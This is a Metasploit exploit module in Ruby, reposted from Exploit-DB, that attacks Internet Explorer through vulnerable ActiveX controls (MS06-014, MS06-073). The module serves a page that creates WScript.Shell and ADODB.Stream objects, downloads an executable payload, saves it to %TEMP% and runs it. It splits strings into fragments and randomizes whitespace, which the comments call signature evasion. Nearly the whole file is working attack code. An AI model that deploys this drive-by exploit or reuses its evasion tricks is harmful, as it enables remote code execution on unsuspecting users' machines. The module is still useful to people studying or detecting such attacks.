Microsoft Internet Explorer – COM CreateObject Code Execution (MS06-014/MS06-073) (Metasploit)

  • Author: Metasploit
    Date: 2010-09-20
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/16561/
  • ##
    # $Id: ie_createobject.rb 10394 2010-09-20 08:06:27Z jduck $
    ##
    
    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##
    
    require 'msf/core'
    
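    class Metasploit3 < Msf::Exploit::Remote
    	Rank = ExcellentRanking

    	include Msf::Exploit::Remote::HttpServer::HTML
    	include Msf::Exploit::Seh
    	include Msf::Exploit::EXE

    	include Msf::Exploit::Remote::BrowserAutopwn
    	autopwn_info({
    		:ua_name=> HttpClients::IE,
    		# In badly misconfigured situations, IE7 and 8 could be vulnerable to
    		# this, but by default they throw an ugly popup that stops all script
    		# execution until the user deals with it and aborts everything if they
    		# click "no". Not worth the risk of being unable to try more recent
    		# exploits. Make sure service packs on top of 6.0 are considered less
    		# than the max by setting to 6.1 (which doesn't really exist).
    		:ua_maxver=> "6.1",
    		:javascript => true,
    		:os_name=> OperatingSystems::WINDOWS,
    		:vuln_test=> 'CreateObject',
    		# Must stay in sync with the CLSIDs listed under 'Targets' below.
    		:classid=>
    			[
    					'{BD96C556-65A3-11D0-983A-00C04FC29E36}',
    					'{BD96C556-65A3-11D0-983A-00C04FC29E30}',
    					'{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}',
    					'{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}',
    					'{6414512B-B978-451D-A0D8-FCFDF33E833C}',
    					'{06723E09-F4C2-43c8-8358-09FCD1DB0766}',
    					'{639F725F-1B2D-4831-A9FD-874847682010}',
    					'{BA018599-1DB3-44f9-83B4-461454C84BF8}',
    					'{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}',
    					'{E8CCCDDF-CA28-496b-B050-6C07C962476B}',
    					'{AB9BCEDD-EC7E-47E1-9322-D4A210617116}',
    					'{0006F033-0000-0000-C000-000000000046}',
    					'{0006F03A-0000-0000-C000-000000000046}',
    			],
    		#:rank => ExcellentRanking# reliable exe writer
    	})

    	# Module metadata. Every non-automatic target carries the CLSID of the
    	# ActiveX control to instantiate; 'Automatic' (index 0) tries them all in
    	# the order listed.
    	def initialize(info = {})
    		super(update_info(info,
    			'Name' => 'Internet Explorer COM CreateObject Code Execution',
    			'Description'=> %q{
    					This module exploits a generic code execution vulnerability in Internet
    				Explorer by abusing vulnerable ActiveX objects.
    			},
    			'License'=> MSF_LICENSE,
    			'Author' =>
    				[
    					'hdm',
    				],
    			'Version'=> '$Revision: 10394 $',
    			'References' =>
    				[
    					# MDAC
    					[ 'MSB', 'MS06-014' ],
    					[ 'CVE', '2006-0003' ],
    					[ 'OSVDB', '24517' ],
    					# WMI Object Broker
    					[ 'MSB', 'MS06-073' ],
    					[ 'CVE', '2006-4704' ],
    					[ 'OSVDB', '30155' ],
    				],
    			'Payload'=>
    				{
    					'Space' => 2048,
    					'StackAdjustment' => -3500,
    				},
    			'Platform' => 'win',
    			'Targets'=>
    				[
    					[ 'Automatic', { } ],

    					# Patched. NOTE: targets 1 and 2 share a display name and differ
    					# only in CLSID; select them by index, not by name.
    					[ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E36}'} ],
    					# Found in mpack
    					[ 'MS06-014 - RDS.DataSpace', { 'CLSID' => '{BD96C556-65A3-11D0-983A-00C04FC29E30}'} ],

    					# Patched
    					[ 'MS06-073 - WMIScriptUtils.WMIObjectBroker2.1', { 'CLSID' => '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}'} ],

    					# These are restricted by site (might be exploitable via DNS spoofing + SSL fun)
    					[ 'UNKNOWN- SoftwareDistribution.MicrosoftUpdateWebControl.1', { 'CLSID' => '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}'} ],
    					[ 'UNKNOWN- SoftwareDistribution.WebControl.1', { 'CLSID' => '{6414512B-B978-451D-A0D8-FCFDF33E833C}'} ],

    					# Visual Studio components, not marked as safe
    					[ 'UNKNOWN- VsmIDE.DTE',{ 'CLSID' => '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'} ],
    					[ 'UNKNOWN- DExplore.AppObj.8.0', { 'CLSID' => '{639F725F-1B2D-4831-A9FD-874847682010}'} ],
    					[ 'UNKNOWN- VisualStudio.DTE.8.0',{ 'CLSID' => '{BA018599-1DB3-44f9-83B4-461454C84BF8}'} ],
    					[ 'UNKNOWN- Microsoft.DbgClr.DTE.8.0',{ 'CLSID' => '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'} ],
    					[ 'UNKNOWN- VsaIDE.DTE',{ 'CLSID' => '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'} ],

    					#
    					# The controls below can launch the "installing component" dialogs...
    					#

    					# Not marked as safe
    					[ 'UNKNOWN- Business Object Factory ',{ 'CLSID' => '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'} ],

    					# Not marked as safe
    					[ 'UNKNOWN- Outlook Data Object', { 'CLSID' => '{0006F033-0000-0000-C000-000000000046}'} ],

    					# Found exploitable in the wild (no details)
    					[ 'UNKNOWN- Outlook.Application', { 'CLSID' => '{0006F03A-0000-0000-C000-000000000046}'} ],

    				],
    			'DefaultTarget'=> 0,
    			'DisclosureDate' => 'Apr 11 2006'))
    	end

    	# HTTP request dispatcher.
    	#
    	# Serves the EXE payload when the client follows the "<page url>/payload"
    	# URL that the exploit page builds for itself, and the exploit HTML for
    	# everything else.
    	#
    	# cli     - the connected client
    	# request - the parsed HTTP request
    	def on_request_uri(cli, request)

    		# Deliberately loose match: the page URL is random, and the JavaScript
    		# appends '/payload' to document.location, so any URI carrying that
    		# substring is treated as the payload fetch.
    		if (request.uri.match(/payload/))
    			send_payload_exe(cli)
    			return
    		end

    		content = exploit_html(target_clsids)

    		# Whitespace randomization is a cheap signature-evasion step.
    		content = Rex::Text.randomize_space(content)

    		print_status("Sending #{self.name} exploit HTML to #{cli.peerhost}:#{cli.peerport}...")

    		# Transmit the response to the client
    		send_response_html(cli, content)

    		# Handle the payload
    		handler(cli)
    	end

    protected

    	# Regenerate the payload for this client and send it as a PE executable
    	# (application/octet-stream). Does nothing if regeneration fails.
    	def send_payload_exe(cli)
    		p = regenerate_payload(cli)
    		return if p.nil?
    		data = generate_payload_exe({ :code => p.encoded })
    		print_status("Sending EXE payload to #{cli.peerhost}:#{cli.peerport}...")
    		send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
    	end

    	# CLSIDs the page should try, in order: every target that carries one when
    	# 'Automatic' is selected, otherwise only the chosen target's CLSID.
    	def target_clsids
    		if (target.name == 'Automatic')
    			targets.map { |t| t['CLSID'] }.compact
    		else
    			[ target['CLSID'] ]
    		end
    	end

    	# Encode +str+ as a JavaScript expression that concatenates one
    	# single-quoted character at a time (" '{' + 'B' + ... "), so the CLSID
    	# never appears as a contiguous literal in the page.
    	def js_char_concat(str)
    		str.unpack('C*').map { |c| " '#{c.chr}' " }.join("+")
    	end

    	# Generate +count+ distinct random identifiers of 2-31 letters.
    	# Distinctness matters: the names become JavaScript function names in the
    	# same scope, and a collision would make one function silently overwrite
    	# another and break the page.
    	def unique_js_names(count)
    		names = []
    		while names.length < count
    			candidate = rand_text_alpha(rand(30)+2)
    			names << candidate unless names.include?(candidate)
    		end
    		names
    	end

    	# Build the exploit page for the given list of CLSIDs.
    	#
    	# The page instantiates each control in turn, uses it to create a
    	# WScript.Shell and an ADODB.Stream, fetches "<page url>/payload", writes
    	# it to %TEMP%\<random>.exe and runs it. Method and ProgID names are
    	# split into string fragments in the JavaScript for signature evasion.
    	def exploit_html(clsids)
    		var_html, var_func_exploit, var_func_go, var_func_createo, var_exe_name = unique_js_names(5)

    		# Comma-terminated list of char-concat expressions; the trailing comma
    		# is consumed by the "null" terminator inside "new Array( ... null )".
    		var_objects = clsids.map { |clsid| js_char_concat(clsid) + "," }.join

    		%Q^
    <html><head><title></title>
    <script language="javascript">

    function #{var_func_createo}( o , n ) {
    	var r = null;

    	try { eval("r=o" + ".C" + "re" + "ate" + "Ob" + "je" + "ct(n)" ) }catch(e){}

    	if (! r) {
    		try { eval("r=o" + ".Cr" + "ea" + "teO" + "bj" + "ect(n,'')" ) }catch(e){}
    	}

    	if (! r) {
    		try { eval("r=o" + ".Cr" + "ea" + "teO" + "bj" + "ect(n,'','')" ) }catch(e){}
    	}

    	if (! r) {
    		try { eval("r=o" + ".Ge" + "tOb" + "je" + "ct('',n)" ) }catch(e){}
    	}

    	if (! r) {
    		try { eval("r=o" + ".Ge" + "tOb" + "ject(n,'')" ) }catch(e){}
    	}

    	if (! r) {
    		try { eval("r=o" + ".Ge" + "tOb" + "ject(n)" ) }catch(e){}
    	}

    	return( r );
    }

    function #{var_func_go}( a ) {

    	var s = #{var_func_createo}( a, "W" + "Sc" + "ri" + "pt" + ".S" + "he" + "ll" );

    	var o = #{var_func_createo}( a, "A" + "DO" + "D" + "B.S" + "tr" + "eam" );

    	var e = s.Environment( "P" + "ro" + "ce" + "ss" );


    	var url = document.location + '/p' + 'ay' + 'lo' + 'ad';
    	var xml = null;
    	var bin = e.Item( "T" + "E" + "M" + "P" ) + "\\\\#{var_exe_name}" + ".e" + "xe";
    	var dat;

    	try { xml=new XMLHttpRequest(); }
    	catch(e) {
    		try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }
    		catch(e) {
    			xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
    		}
    	}

    	if (! xml) {
    		return(0);
    	}

    	xml.open("GET", url, false);
    	xml.send(null);
    	dat = xml.responseBody;

    	o.Type = 1 ;
    	o.Mode = 3 ;
    	o.Open ( ) ;
    	o.Write ( dat ) ;
    	o.SaveToFile ( bin, 2) ;

    	s.Run ( bin , 0 );
    }

    function #{var_func_exploit}( ) {
    	var i = 0;
    	var t = new Array( #{var_objects} null );

    	while (t[i]) {
    		var a = null;

    		if (t[i].substring(0,1) == '{') {
    			a = document.createElement("object");
    			a.setAttribute("cl" + "as" + "sid", "cl" + "s" + "id" +":" + t[i].substring( 1, t[i].length - 1 ) ) ;
    		} else {
    			try { a = new ActiveXObject(t[i]); } catch(e){}
    		}

    		if (a) {
    			try {
    				var b = #{var_func_createo}( a , "W" + "Sc" + "ri" + "pt" + ".S" + "he" + "ll" ) ;
    				if (b) {
    					#{var_func_go}( a ) ;
    					return(0) ;
    				}
    			} catch(e){
    			}
    		}
    		i++;
    	}
    }
    </script>
    </head>
    <body onload='#{var_func_exploit}()'>
    #{var_html}
    </body>
    </html>

    ^
    	end

    end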